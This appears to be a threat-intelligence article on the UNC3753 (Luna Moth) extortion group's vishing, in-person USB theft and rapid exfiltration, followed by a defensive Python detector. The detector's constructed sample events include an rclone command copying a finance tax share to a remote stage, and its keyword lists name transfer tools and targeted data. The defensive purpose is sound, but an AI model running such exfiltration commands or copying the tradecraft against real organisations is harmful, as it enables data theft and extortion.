Extortionists Escalate Tactics: From Vishing to USB Sticks for Data Theft
A sophisticated extortion group, known as UNC3753 or Luna Moth, is employing a dual-pronged attack strategy, combining social engineering via fake help desk calls with physical office visits to steal data using USB drives.

A persistent extortion gang, tracked by Google's Mandiant as UNC3753 and also known by aliases such as Luna Moth, Chatty Spider, and Silent Ransom Group, has been aggressively targeting financial institutions, law firms, and professional services companies across the United States. Operating since at least 2022, the group initially relied on deceptive emails about software renewals to lure victims into calling attacker-controlled call centers. However, a significant shift in tactics occurred around March 2025, when UNC3753 began impersonating IT help desk staff to gain initial access to corporate networks.
While digital vectors remain their primary method, UNC3753 has demonstrated a willingness to escalate their operations to physical intrusions. When remote social engineering fails, the threat actors have been observed visiting victim offices in person, posing as IT technicians. Their objective is to gain direct access to sensitive data, which they then exfiltrate using physical media like USB drives. This physical tactic has been corroborated by an FBI alert concerning the Silent Ransom Group, which has employed similar methods as recently as the spring of 2026.
Once inside a victim's office, the attackers present themselves as IT support personnel needing to perform routine maintenance, such as imaging a device or creating local backups for security purposes. If their ruse is successful, they proceed to plug a USB drive into the target's computer, enabling them to copy sensitive files directly. Mandiant assesses that these physical intrusions are likely linked to UNC3753 due to overlapping targeting, operational timelines, and methodologies, despite the limited forensic evidence available in such cases.
A particularly alarming characteristic of UNC3753's operations is their speed. Mandiant has documented numerous incidents where the entire attack lifecycle, from initial contact to data theft and extortion, was completed within a single day. In some recent cases, the threat actors managed to conduct data searches, stage the exfiltrated information, and complete the theft in under an hour, highlighting the critical need for rapid incident response capabilities.
The initial lure often involves invoice-themed emails that, surprisingly, do not contain malicious links or attachments. Their sole purpose is to establish a pretext for a follow-up phone call, making the subsequent social engineering attempts appear more legitimate. This voice-phishing approach, which has proven successful for other groups like ShinyHunters and Scattered Spider, is a cornerstone of UNC3753's intrusion strategy.
Attackers leverage various communication platforms, including Zoom, Microsoft Teams, and Quick Assist, to conduct screen-sharing sessions, gaining direct control over victim systems. In some instances, UNC3753 has even established sessions on targets' personal laptops, using these compromised machines to pivot into corporate virtual desktop infrastructure (VDI) environments. Once inside, they meticulously map network drives and target specific data repositories, employing precise keyword searches to locate sensitive documents such as tax forms, audit files, client agreements, and personally identifiable information.
Exfiltration of stolen data is conducted using stealthy methods to evade detection. UNC3753 employs tools like portable versions of WinSCP or Rclone, uploads data through compromised browser-based file-sharing accounts, or instructs victims to email files to attacker-controlled addresses. Following data exfiltration, which often occurs within 30 minutes of exiting the victim's environment, the group issues an extortion demand, typically setting a three-day deadline for negotiations before threatening to leak the data and notify employees, partners, and customers.
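The tradecraft in the two paragraphs above gives defenders a few concrete signals to correlate: a remote-support or screen-sharing session, a portable file-transfer tool (rclone or WinSCP) launched from a user-writable path, keyword-targeted copies of finance or legal data, and USB mass-storage attachment. The detector below is an added illustration written for this article, not code from Mandiant, the FBI or any vendor; the log lines are constructed in a Sysmon-like shape, and the process names, field names and the 30-minute correlation window are assumptions chosen for the example.

```python
"""Correlation sketch for the UNC3753-style activity described above.
Events are constructed samples (not real telemetry) shaped loosely like
Sysmon process-create and device-attach records."""
from datetime import datetime, timedelta

# Constructed sample events: one host shows remote support followed by a
# portable rclone copy of a tax share; another shows a USB attach followed
# by WinSCP from %TEMP%. The Excel launch is benign background noise.
SAMPLE_EVENTS = [
    {"ts": "2025-06-02T09:58:10", "host": "WS-FIN-07", "user": "acme\\jdoe",
     "event": "process_create", "image": r"C:\Windows\System32\quickassist.exe",
     "cmd": "quickassist.exe"},
    {"ts": "2025-06-02T10:04:31", "host": "WS-FIN-07", "user": "acme\\jdoe",
     "event": "process_create", "image": r"C:\Users\jdoe\Downloads\rclone.exe",
     "cmd": 'rclone.exe copy "\\\\fileserver\\finance\\tax" remote:stage --transfers 8'},
    {"ts": "2025-06-02T11:20:00", "host": "WS-LGL-12", "user": "acme\\msmith",
     "event": "process_create",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": "EXCEL.EXE"},
    {"ts": "2025-06-02T14:02:45", "host": "WS-LGL-12", "user": "acme\\msmith",
     "event": "usb_attach", "image": "",
     "cmd": "USBSTOR\\Disk&Ven_Generic&Prod_Flash_Disk"},
    {"ts": "2025-06-02T14:03:10", "host": "WS-LGL-12", "user": "acme\\msmith",
     "event": "process_create",
     "image": r"C:\Users\msmith\AppData\Local\Temp\WinSCP.exe", "cmd": "WinSCP.exe"},
]

# Assumed process names; tune to the remote-support tools your estate allows.
REMOTE_SUPPORT = ("quickassist.exe", "zoom.exe", "teams.exe", "ms-teams.exe")
TRANSFER_TOOLS = ("rclone.exe", "winscp.exe")
# Portable tools dropped by an attacker typically run from user-writable paths.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\downloads\\", "\\appdata\\")
# Keywords the article lists as targeted data types (assumed spellings).
SENSITIVE = ("tax", "audit", "agreement", "ssn", "w-2", "payroll")
WINDOW = timedelta(minutes=30)  # assumed correlation window


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (host, rule, timestamp) alerts, correlating per host in time order."""
    alerts = []
    last_remote = {}  # host -> time of most recent remote-support launch
    last_usb = {}     # host -> time of most recent USB mass-storage attach
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        host = ev["host"]
        if ev["event"] == "usb_attach":
            last_usb[host] = ts
            alerts.append((host, "usb_mass_storage_attached", ev["ts"]))
            continue
        name = basename(ev["image"])
        if name in REMOTE_SUPPORT:
            last_remote[host] = ts  # not alertable alone; remembered for correlation
            continue
        if name not in TRANSFER_TOOLS:
            continue
        if any(p in ev["image"].lower() for p in USER_WRITABLE):
            alerts.append((host, "portable_transfer_tool_in_user_path", ev["ts"]))
        if any(k in ev["cmd"].lower() for k in SENSITIVE):
            alerts.append((host, "sensitive_keyword_in_transfer_cmd", ev["ts"]))
        if host in last_remote and ts - last_remote[host] <= WINDOW:
            alerts.append((host, "transfer_tool_after_remote_support", ev["ts"]))
        if host in last_usb and ts - last_usb[host] <= WINDOW:
            alerts.append((host, "transfer_tool_after_usb_attach", ev["ts"]))
    return alerts


if __name__ == "__main__":
    for host, rule, when in detect(SAMPLE_EVENTS):
        print(f"{when} {host} {rule}")
```

The single-tool rules fire on their own, but the sequence rules are what separate this pattern from an administrator legitimately using WinSCP: a transfer tool from a user-writable path within minutes of a remote-support session or a USB attach, on a host where the command line names finance or legal material, is the sub-hour lifecycle the article describes. Given the speed reported, these alerts are worth routing to a response channel that can isolate the host rather than to a daily review queue.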
The potential impact of these attacks is severe, encompassing reputational damage, stock price depreciation, termination of business deals, and legal claims from affected parties. The group's detailed extortion emails explicitly outline the consequences of non-compliance, including public data exposure, regulatory scrutiny, and business collapse, underscoring the critical importance of robust cybersecurity defenses against both digital and physical intrusion vectors.